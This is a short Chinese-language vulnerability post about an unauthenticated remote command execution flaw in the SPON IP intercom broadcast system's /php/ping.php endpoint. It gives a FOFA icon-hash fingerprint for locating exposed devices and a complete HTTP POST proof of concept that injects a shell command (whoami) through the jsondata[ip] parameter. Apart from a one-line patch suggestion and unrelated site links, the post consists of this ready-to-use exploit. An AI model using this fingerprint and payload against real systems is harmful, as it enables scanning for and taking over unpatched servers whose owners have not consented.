世邦 IP网络对讲广播系统 ping.php接口存在远程命令执行漏洞

产品简介

SPON世邦IP网络对讲广播系统是一种先进的通信解决方案,旨在提供高效的网络对讲和广播功能。

漏洞概述

SPON世邦IP网络对讲广播系统ping.php接口存在远程命令执行漏洞,未经身份验证的攻击者可利用此漏洞执行高危命令获取服务器权限。

指纹识别

fofa:

python 复制代码
icon_hash="-1830859634"

漏洞利用

poc:

python 复制代码
POST /php/ping.php HTTP/1.1
Host: your_ip
Pragma: no-cache
Cache-Control: no-cache
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

jsondata%5Btype%5D=123&jsondata%5Bip%5D=whoami

执行whoami命令

修复建议

联系软件厂商更新至最新安全版本

相关推荐
凛_Lin~~15 小时前
安卓网络框架——OkHttp源码解析(基于3.14.x)
android·网络·okhttp
w***765515 小时前
临时文件自动化管理:高效安全新方案
运维·安全·自动化
阿里-于怀15 小时前
Nacos 安全护栏:MCP、Agent、配置全维防护,重塑 AI Registry 安全边界
安全·ai·nacos·agent
乾元15 小时前
智能化侦察:利用 LLM 进行自动化资产暴露面识别与关联
运维·网络·人工智能·网络协议·安全·自动化
皓月盈江16 小时前
个人计算机Linux Debian桌面操作系统上网安全防护措施
linux·ubuntu·网络安全·debian·桌面操作系统·上网安全防护措施
普马萨特16 小时前
手机共享位置的技术原理解析
网络
两包药就好16 小时前
网络安全笔记
安全
明天…ling16 小时前
php底层原理与安全漏洞实战
开发语言·php
xency16 小时前
前四天整理
网络
大榕树信息科技16 小时前
如何利用动力环境监控系统提升机房管理智能化?
网络·物联网·机房运维·机房管理系统·动环监控系统